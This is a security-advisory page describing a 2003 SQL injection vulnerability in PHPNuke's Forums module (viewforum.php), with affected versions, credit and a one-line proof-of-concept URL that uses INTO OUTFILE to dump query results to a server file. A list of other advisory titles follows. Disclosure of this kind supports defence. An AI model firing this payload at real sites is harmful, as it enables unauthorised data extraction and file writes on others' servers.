exploits , vulnerabilities , articles , PHPNuke Forum Module Viewforum.PHP SQL Injection Vulnerability

Title	PHPNuke Forum Module Viewforum.PHP SQL Injection Vulnerability
Published	2003-03-25-12:00AM
Updated	2003-03-25-11:43PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery of this vulnerability has been credited to PHP-Nuke Frog Man <leseulfrog@hotmail.com>.
Vulnerable	Francisco Burzi PHPNuke 6.5 RC2 Francisco Burzi PHPNuke 6.0
Not Vulnerable
Code	The following proof of concept was supplied: http://www.example.com/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-11-21 SocialEngine HTTP Response Splitting and SQL-injection Vulnerabilities
• 2008-11-21 Oracle Database Vault Privilege Escalation Vulnerability
• 2008-11-20 GeSHi XML Parsing Remote Denial Of Service Vulnerability
• 2008-11-20 Softbiz Classifieds Script Cross Site Scripting Vulnerability
• 2008-11-20 P3nfs Insecure Temporary File Creation Vulnerability
• 2008-11-20 Easyedit Multiple SQL Injection Vulnerabilities
• 2008-11-20 SystemImager Insecure Temporary File Creation Vulnerabilities
• 2008-11-20 Yasna Yazd Discussion Forum Multiple Cross-Site Scripting Vulnerabilities
• 2008-11-20 phpBLASTER CMS Multiple Local File Include Vulnerabilities
• 2008-11-19 Symantec Backup Exec Data Management Protocol Buffer Overflow Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 21 Nov 2008 06:52:15 +0000